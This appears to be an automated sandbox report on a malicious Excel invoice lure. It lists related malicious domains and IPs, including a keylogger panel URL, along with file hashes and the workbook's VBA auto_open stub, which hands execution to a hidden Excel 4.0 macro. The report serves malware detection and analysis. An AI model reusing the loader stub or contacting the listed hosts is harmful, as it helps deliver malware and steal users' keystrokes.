Hypervisor based Inspection enabled: false
Report type: full
Sample file name: Proforma Invoice.xls
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name: Without Instrumentation
Number of new started processes analysed: 13
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal88.expl.evad.winXLS@13/11@2/2
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 5
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to French - France
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 205.185.216.42, 205.185.216.10
• Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, au-bg-shim.trafficmanager.net

Simulations

Behavior and APIs

Time | Type | Description
10:12:50 | API Interceptor | 461x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match / Associated Sample Name / URL | Detection | Context

202.92.6.10
  Invoice.xlsm | malicious | shopphongtinh.com/client.exe
  SA Covid-19 Funding Connection.xlsm | malicious | shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=530978&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:05%20PM
  invoice.exe | malicious | shopphongtinh.com/key/panel/base/post.php?type=keystrokes&machinename=960781&windowtitle=Program%20Manager&keystrokestyped=&machinetime=8:06%20PM
  http://thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-II | malicious | thungcartonvinatc.com/MxZhe-bBdwsbFVz36TAJH_YObpULtA-II/

104.22.1.232
  http://cutt.ly/ | malicious | cutt.ly/

Domains

Match / Associated Sample Name / URL | Detection | Context

cutt.ly
  Proforma Invoice.xls | malicious | 104.22.0.232
  Shipping Invoice.xls | malicious | 104.22.1.232
  Shipping Invoice.xls | malicious | 104.22.1.232
  Shipping Invoice.xls | malicious | 104.22.0.232
  wHrBhrpp3q.csv | malicious | 172.67.8.238
  wHrBhrpp3q.csv | malicious | 172.67.8.238
  wHrBhrpp3q.csv | malicious | 172.67.8.238
  SecuriteInfo.com.Exploit.Siggen2.64979.12090.xls | malicious | 104.22.1.232
  SecuriteInfo.com.Exploit.Siggen2.64979.3440.xls | malicious | 104.22.0.232
  SecuriteInfo.com.Exploit.Siggen2.64979.12090.xls | malicious | 104.22.0.232
  SecuriteInfo.com.Exploit.Siggen2.64979.3440.xls | malicious | 172.67.8.238
  SecuriteInfo.com.Exploit.Siggen2.64979.12090.xls | malicious | 104.22.1.232
  SecuriteInfo.com.Exploit.Siggen2.64979.3440.xls | malicious | 104.22.0.232
  Invoice.xls | malicious | 104.22.1.232
  Invoice.xls | malicious | 104.22.0.232
  Invoice.xls | malicious | 104.22.1.232
  file.xls | malicious | 104.22.1.232
  file.xls | malicious | 172.67.8.238
  file.xls | malicious | 172.67.8.238

shopphongtinh.com
  Proforma Invoice.xls | malicious | 202.92.6.10
  Proforma Invoice.xls | malicious | 202.92.6.10
  client.exe | malicious | 202.92.6.10
  Invoice.xlsm | malicious | 202.92.6.10
  SA Covid-19 Funding Connection.xlsm | malicious | 202.92.6.10
  invoice.exe | malicious | 202.92.6.10

ASN

Match / Associated Sample Name / URL | Detection | Context

CLOUDFLARENETUS
  Payment Advice - Advice Ref GLV823990339.exe | malicious | 23.227.38.64
  Proforma Invoice.xls | malicious | 104.22.1.232
  Proforma Invoice.xls | malicious | 104.22.0.232
  https://www.canva.com/design/DAENqED8UzU/0m_RcAQIILTwa79MyPG8KA/view?utm_content=DAENqED8UzU&utm_campaign=designshare&utm_medium=link&utm_source=sharebutton | malicious | 104.18.215.67
  1099008FEDEX_090887766.xls | malicious | 104.20.138.65
  https://akljsdhfas.selz.com/? | malicious | 104.18.108.36
  quotation_0087210_pdf.exe | malicious | 172.67.188.154
  Purchase Order 40,7045$.exe | malicious | 104.24.105.107
  1099008FEDEX_090887766.xls | malicious | 162.159.134.233
  INQUIRY.exe | malicious | 104.27.152.230
  PO Quotation.jar | malicious | 104.20.22.46
  doc2227740.xls | malicious | 104.27.172.15
  PO Quotation.jar | malicious | 104.20.23.46
  doc2227740.xls | malicious | 104.27.173.15
  TRIAL-ORDER.exe | malicious | 104.18.57.249
  d11311145.xls | malicious | 104.27.173.15
  23692 ANRITSU PROBE po 29288.exe | malicious | 104.23.99.190
  d11311145.xls | malicious | 104.27.173.15
  PO #5618896.gz.exe | malicious | 104.23.98.190
  PO#0007507_009389283882873PDF.exe | malicious | 162.159.134.233

VNPT-AS-VNVNPTCorpVN
  Proforma Invoice.xls | malicious | 202.92.6.10
  Proforma Invoice.xls | malicious | 202.92.6.10
  qkN4OZWFG6.exe | malicious | 221.132.33.88
  FMFF7xj5.exe | malicious | 103.207.39.131
  rJz6SePuqu.dll | malicious | 123.19.40.157
  Order inquiry.exe | malicious | 103.207.38.182
  Nissin Eletach Vietnam Co., Ltd - PRODUCTS LIST.exe | malicious | 203.162.4.149
  http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/ | malicious | 113.160.161.75
  http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm/ | malicious | 113.160.161.75
  http://tuyethuongtra.com/wp-content/plugins/wp-nest-pages/lm | malicious | 113.160.161.75
  OK093822333448.doc | malicious | 103.255.237.196
  http://megalighthotel.com/c9tf/Scan/jg5zl1ho/a0k89721503873576lc1wkiavm472/ | malicious | 113.160.250.165
  DETAILS.jar | malicious | 103.207.39.83
  Readmore Details.exe | malicious | 103.207.39.83
  SecuriteInfo.com.Trojan.PackedNET.405.16508.exe | malicious | 103.207.39.83
  detail-information.exe | malicious | 103.207.39.83
  INFORMATIONS.doc.......exe | malicious | 103.207.39.83
  executed.exe | malicious | 103.207.39.83
  _000819.exe | malicious | 113.161.148.81
  _000822.exe | malicious | 113.161.148.81

JA3 Fingerprints

Match / Associated Sample Name / URL | Detection | Context

05af1f5ca1b87cc9cc9b25185115607d
  Proforma Invoice.xls | malicious | 104.22.1.232
  1099008FEDEX_090887766.xls | malicious | 104.22.1.232
  VQ01173428.doc | malicious | 104.22.1.232
  SIN029088.xls | malicious | 104.22.1.232
  SMBS PO 30 quotation.xls | malicious | 104.22.1.232
  SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsm | malicious | 104.22.1.232
  SecuriteInfo.com.Trojan.GenericKD.35249420.21118.xlsm | malicious | 104.22.1.232
  SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsm | malicious | 104.22.1.232
  SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.14177.xlsm | malicious | 104.22.1.232
  SecuriteInfo.com.Mal.Generic-S.18660.xls | malicious | 104.22.1.232
  SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsm | malicious | 104.22.1.232
  SecuriteInfo.com.Mal.Generic-S.27944.xls | malicious | 104.22.1.232
  SecuriteInfo.com.VBA.Heur2.SCrypted.3.D72DA639.Gen.16832.xlsm | malicious | 104.22.1.232
  SecuriteInfo.com.Heur.5466.xls | malicious | 104.22.1.232
  WayBill Invoice.xls | malicious | 104.22.1.232
  WayBill Invoice.xls | malicious | 104.22.1.232
  Untitled 20201030.doc | malicious | 104.22.1.232
  request.2890.xls | malicious | 104.22.1.232
  request613.xls | malicious | 104.22.1.232
  UW_Medley Storage_20201030.xlsm | malicious | 104.22.1.232

Dropped Files

No context

Created / dropped Files

                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                  Category:dropped
                                                  Size (bytes):58936
                                                  Entropy (8bit):7.994797855729196
                                                  Encrypted:true
                                                  SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                  MD5:E4F1E21910443409E81E5B55DC8DE774
                                                  SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                  SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                  SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):326
                                                  Entropy (8bit):3.123186963792904
                                                  Encrypted:false
                                                  SSDEEP:6:kK9IwswwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:vkPlE99SNxAhUegeT2
                                                  MD5:E733B1D7EC5FBD6CA27FAE46230B8523
                                                  SHA1:6A9AF125B0D6140760F33FFBDFCAA1DACB4AC727
                                                  SHA-256:47C093908539B2EA023EFE18587C6A71DD19C3DE1763D10892B4580B873F5074
                                                  SHA-512:25FE4AF99593EF664AD74D11899715544C8A00565054E73A26B07A8AEA8EFA648B35408597CB600CBB25C796D83096B8714010B27BFC05801E0E90C836D172B0
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: p...... ........V.x.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                  C:\Users\user\AppData\Local\Temp\Cab2618.tmp
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                  Category:dropped
                                                  Size (bytes):58936
                                                  Entropy (8bit):7.994797855729196
                                                  Encrypted:true
                                                  SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                  MD5:E4F1E21910443409E81E5B55DC8DE774
                                                  SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                  SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                  SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: MSCF....8.......,...................I........S........LQ.v .authroot.stl..0(/.5..CK..8T....c_.d...:.(.....].M$[v.4CH)-.%.QIR..$t)Kd...D.....3.n..u..............|..=H4.U=...X..qn.+S..^J.....y.n.v.XC...3a.!.....]...c(...p..]..M.....4.....i...}C.@.[..#xUU..*D..agaV..2.|.g...Y..j.^..@.Q......n7R...`.../..s...f...+...c..9+[.|0.'..2!.s....a........w.t:..L!.s....`.O>.`#..'.pfi7.U......s..^...wz.A.g.Y........g......:7{.O.......N........C..?....P0$.Y..?m....Z0.g3.>W0&.y](....].`>... ..R.qB..f.....y.cEB.V=.....hy}....t6b.q./~.p........60...eCS4.o......d..}.<,nh..;.....)....e..|....Cxj...f.8.Z..&..G.......b.....OGQ.V..q..Y.............q...0..V.Tu?.Z..r...J...>R.ZsQ...dn.0.<...o.K....|.....Q...'....X..C.....a;.*..Nq..x.b4..1,}.'.......z.N.N...Uf.q'.>}........o\.cD"0.'.Y.....SV..g...Y.....o.=.....k..u..s.kV?@....M...S.n^.:G.....U.e.v..>...q.'..$.)3..T...r.!.m.....6...r,IH.B <.ht..8.s..u[.N.dL.%...q....g..;T..l..5...\.....g...`...........A$:...........
                                                  C:\Users\user\AppData\Local\Temp\E3FE0000
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):57011
                                                  Entropy (8bit):7.861939790415782
                                                  Encrypted:false
                                                  SSDEEP:1536:/CyZD1jZKT4gHjmSb4wjE7zF0Rhdv1hQzMrTW:/5jjs0gVb4GE0DrTW
                                                  MD5:F4E0A1574520BEED64563164AC9C6F09
                                                  SHA1:70FC986FB84ED4DA58B544132996B1832C6E1BA4
                                                  SHA-256:306CB210EE5EB52162D117C45926E22F8880FBF4255FECF751753AEE5A954A6E
                                                  SHA-512:FB8B2F8ED81D22E233FFAC2DBB702FAAF1BF75BEB87368FFA23CD696293937956C2C03A6ED74D00F9A760FA2884FDF2E32B1CCEED83EE9C8A0FB9989A1FBF477
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview: .TMo.1..W..X.Z.Mz...%.$=6......X...v........XPrYym...gf|...ZbL..]....I...7......R...x..[cb7../.u.T....9..B$...}@G'3.-d..s.@.`...h.]H.2.\...&.;........7..7g...^.j..._..A.T.=..`..L...)nS.g3-./....3.|.,.I.l.&.. 'd..Z..W....r.k.}.=.^&j..#...,.A..x.q1.~.O...q%..."fnAF..`j....ExD...A....ny}.nA.g..+.z.....a.....K%.S...#..o....T.(..9fO.......6....i.]...!..".?9R..z....P.^K.._|<.=.)]*...!.D.xy..z...@D...m..."u..{.e^*T..E7.'........PK..........!..._.............[Content_Types].xml ...(............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                  C:\Users\user\AppData\Local\Temp\Tar2619.tmp
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):152533
                                                  Entropy (8bit):6.31602258454967
                                                  Encrypted:false
                                                  SSDEEP:1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA
                                                  MD5:D0682A3C344DFC62FB18D5A539F81F61
                                                  SHA1:09D3E9B899785DA377DF2518C6175D70CCF9DA33
                                                  SHA-256:4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A
                                                  SHA-512:0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview: 0..S...*.H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Nov 19 17:12:47 2020, atime=Thu Nov 19 17:12:47 2020, length=8192, window=hide
                                                  Category:dropped
                                                  Size (bytes):867
                                                  Entropy (8bit):4.472643117708891
                                                  Encrypted:false
                                                  SSDEEP:12:85Q12CLgXg/XAlCPCHaX2B8GB/1IX+WnicvbLKG+bDtZ3YilMMEpxRljKATdJP9O:85/U/XTm6G8YevLSDv3q5rNru/
                                                  MD5:AD259C9A8C9F26185EBDE7B41E54BBB9
                                                  SHA1:C643FC367524617E123B1B636707B374FB241EF2
                                                  SHA-256:C3B6011FEA9262DD1C376A32F7AF692D1EE93D16556E0EE31F59EB4C896AA1C3
                                                  SHA-512:52511CE096413F195383C86185FE4A4092A64EDBCFA517DC04A97F9E61CDCEA1FAB969C8D02FEBFA5C86BB196E9AE3327A745A593D6D287DE380D7542ED2DCC0
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Proforma Invoice.LNK
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Thu Nov 19 17:12:47 2020, atime=Thu Nov 19 17:12:47 2020, length=78336, window=hide
                                                  Category:dropped
                                                  Size (bytes):2088
                                                  Entropy (8bit):4.5643277851765625
                                                  Encrypted:false
                                                  SSDEEP:48:87M/XTFGqMtk69Lt85Qh27M/XTFGqMtk69Lt85Q/:8Q/XJGq8/9585Qh2Q/XJGq8/9585Q/
                                                  MD5:41C1A8CF3064B63D878FBFE24DBA7217
                                                  SHA1:88A66CB5685F0F504AAEA5A03C50F9705FD145C0
                                                  SHA-256:F9E5559A17D66EEB13A67FD058244E83A991EBD15248237397D2E88A98432F2D
                                                  SHA-512:B6D9AAE6BDA000CC61DDF1FC310DB738EDDCDDDE46A1FC444EEF2E3FB0BD54AA33A2B69647BB754771B8DC2F9C90CC6B22B54C2ED7CFE019002F69C32D2D2EFB
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):101
                                                  Entropy (8bit):4.7170989234879075
                                                  Encrypted:false
                                                  SSDEEP:3:oyBVomMQDMILGMXd6ltaQILGMXd6lmMQDMILGMXd6lv:dj6GKg2afKgKGKgC
                                                  MD5:BC11129FCE6D9C1A695193CDCB97B257
                                                  SHA1:2EC83352C02CCC01E7513A894800E1219605F24B
                                                  SHA-256:31376558D616FB12266F87483A5097CA308C0EA58FCE25853A90FD33BCFE2140
                                                  SHA-512:03435DE22EEF6F71B2A327744ABD8B1A1FA8E4C04656A66DC9EBFBD7FE1C493EE857AED2B95AB4C1BB0A9A1D14FE2A6254C1F32453BBE3BC216E52E8EF7EBEC9
                                                  Malicious:false
                                                  Preview: Desktop.LNK=0..[xls]..Proforma Invoice.LNK=0..Proforma Invoice.LNK=0..[xls]..Proforma Invoice.LNK=0..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BM2ZHU76DBVAIO05YU20.temp
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5925624900972752
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMq+qvsqvJCwofz8hQCsMq+qvsEHyqvJCworZz2YYbH8f8HXlUVNIu:cyDofz8yXHnorZz2kf8HGIu
                                                  MD5:623A126A88BC9A8082AC381E1CC11A6A
                                                  SHA1:C197DFA90570AA13F8771D9F0EF87BA50481A51D
                                                  SHA-256:E0D3D610D5A08BCC57FAD0B8659AFF2A091E05D13713C2527D28A9C74CBC1B3B
                                                  SHA-512:291C11C42D68792427A6EEB6D42AA6A3B00D665D6561E7107B3D55CD17075E082C2655B17F90B61F82233BC122D7C43072D8BEB5CE2186ECBDBEF76C9DAE02C1
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UAZUVM4XYCM7ZTE5LGRD.temp
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5925624900972752
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMq+qvsqvJCwofz8hQCsMq+qvsEHyqvJCworZz2YYbH8f8HXlUVNIu:cyDofz8yXHnorZz2kf8HGIu
                                                  MD5:623A126A88BC9A8082AC381E1CC11A6A
                                                  SHA1:C197DFA90570AA13F8771D9F0EF87BA50481A51D
                                                  SHA-256:E0D3D610D5A08BCC57FAD0B8659AFF2A091E05D13713C2527D28A9C74CBC1B3B
                                                  SHA-512:291C11C42D68792427A6EEB6D42AA6A3B00D665D6561E7107B3D55CD17075E082C2655B17F90B61F82233BC122D7C43072D8BEB5CE2186ECBDBEF76C9DAE02C1
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Y3RTLD02WH835DFVTTFZ.temp
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5925624900972752
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMq+qvsqvJCwofz8hQCsMq+qvsEHyqvJCworZz2YYbH8f8HXlUVNIu:cyDofz8yXHnorZz2kf8HGIu
                                                  MD5:623A126A88BC9A8082AC381E1CC11A6A
                                                  SHA1:C197DFA90570AA13F8771D9F0EF87BA50481A51D
                                                  SHA-256:E0D3D610D5A08BCC57FAD0B8659AFF2A091E05D13713C2527D28A9C74CBC1B3B
                                                  SHA-512:291C11C42D68792427A6EEB6D42AA6A3B00D665D6561E7107B3D55CD17075E082C2655B17F90B61F82233BC122D7C43072D8BEB5CE2186ECBDBEF76C9DAE02C1
                                                  Malicious:false

                                                  Static File Info

                                                  General

                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Dexter MORGAN, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Sun Oct 25 18:24:14 2020, Last Saved Time/Date: Sat Nov 14 12:53:19 2020, Security: 1
                                                  Entropy (8bit):6.722113426938609
                                                  TrID:
                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                  File name:Proforma Invoice.xls
                                                  File size:76288
                                                  MD5:55db711144ff4a35faf58d982e7cf727
                                                  SHA1:ea7b59dde9f0600915069dec66f8410f25cb66fd
                                                  SHA256:6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
                                                  SHA512:92e99e23ef71f4b1b9e3f6733ca16d51a2e44a777581c6a4a9b35b4c3574620cbff37ba02052bd7932f75acd2b70a2750f4c53c0d87db75e8a10c4aa1cf4192a
                                                  SSDEEP:1536:/pqnSGiysRchNXHfA1MiWhZFGkElMFAAr7IQmSb4wIE7zp0RhBv1hQz7rTb16mL:/4nSGiysRchNXHfA1MiWhZFGkElMFAAv

                                                  File Icon

                                                  Icon Hash:e4eea286a4b4bcb4

                                                  Static OLE Info

                                                  General

                                                  Document Type:OLE
                                                  Number of OLE Files:1

                                                  OLE File "Proforma Invoice.xls"

                                                  Indicators

                                                  Has Summary Info:True
                                                  Application Name:Microsoft Excel
                                                  Encrypted Document:False
                                                  Contains Word Document Stream:False
                                                  Contains Workbook/Book Stream:True
                                                  Contains PowerPoint Document Stream:False
                                                  Contains Visio Document Stream:False
                                                  Contains ObjectPool Stream:
                                                  Flash Objects Count:
                                                  Contains VBA Macros:True

                                                  Summary

                                                  Code Page:1252
                                                  Author:Dexter MORGAN
                                                  Last Saved By:Administrator
                                                  Create Time:2020-10-25 18:24:14
                                                  Last Saved Time:2020-11-14 12:53:19
                                                  Creating Application:Microsoft Excel
                                                  Security:1

                                                  Document Summary

                                                  Document Code Page:1252
                                                  Thumbnail Scaling Desired:False
                                                  Company:
                                                  Contains Dirty Links:False
                                                  Shared Document:False
                                                  Changed Hyperlinks:False
                                                  Application Version:983040

                                                  Streams with VBA

                                                  VBA File Name: Feuil1.cls, Stream Size: 977
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Feuil1
                                                  VBA File Name:Feuil1.cls
                                                  Stream Size:977

                                                  VBA Code Keywords

                                                  Keyword
                                                  VB_Exposed
                                                  Attribute
                                                  VB_Name
                                                  VB_Creatable
                                                  VB_PredeclaredId
                                                  VB_GlobalNameSpace
                                                  VB_Base
                                                  VB_Customizable
                                                  False
                                                  VB_TemplateDerived
                                                  VBA Code
                                                  Attribute VB_Name = "Feuil1"
                                                  Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True
                                                  VBA File Name: Module1.bas, Stream Size: 1512
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                                                  VBA File Name:Module1.bas
                                                  Stream Size:1512

                                                  VBA Code Keywords

                                                  Keyword
                                                  (strMacro)
                                                  strMacro
                                                  Attribute
                                                  auto_open()
                                                  VB_Name
                                                  String
                                                  VBA Code
                                                  Attribute VB_Name = "Module1"
                                                  ' VBA stub that Excel runs automatically when the workbook is opened
                                                  Sub auto_open()
                                                      Dim strMacro As String
                                                      ' Give cell E580 of the first sheet a defined name at run time;
                                                      ' "Auto_ouvrir" is the French-locale spelling of "Auto_Open"
                                                      Sheets(1).Range("E580").Name = "Auto_ouvrir51"
                                                      ' Hand off from VBA to the Excel 4.0 (XLM) macro stored at that name
                                                      strMacro = "Auto_ouvrir51"
                                                      Run (strMacro)
                                                  End Sub
                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                  General
                                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                  VBA File Name:ThisWorkbook.cls
                                                  Stream Size:985

                                                  VBA Code Keywords

                                                  Keyword
                                                  False
                                                  VB_Exposed
                                                  Attribute
                                                  VB_Name
                                                  VB_Creatable
                                                  "ThisWorkbook"
                                                  VB_PredeclaredId
                                                  VB_GlobalNameSpace
                                                  VB_Base
                                                  VB_Customizable
                                                  VB_TemplateDerived
                                                  VBA Code
                                                  Attribute VB_Name = "ThisWorkbook"
                                                  Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                  Attribute VB_GlobalNameSpace = False
                                                  Attribute VB_Creatable = False
                                                  Attribute VB_PredeclaredId = True
                                                  Attribute VB_Exposed = True
                                                  Attribute VB_TemplateDerived = False
                                                  Attribute VB_Customizable = True

                                                  Streams

                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 115
                                                  General
                                                  Stream Path:\x1CompObj
                                                  File Type:data
                                                  Stream Size:115
                                                  Entropy:4.26356656053
                                                  Base64 Encoded:True
                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F ' . . . F e u i l l e d e c a l c u l M i c r o s o f t E x c e l . 2 0 0 3 . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 296
                                                  General
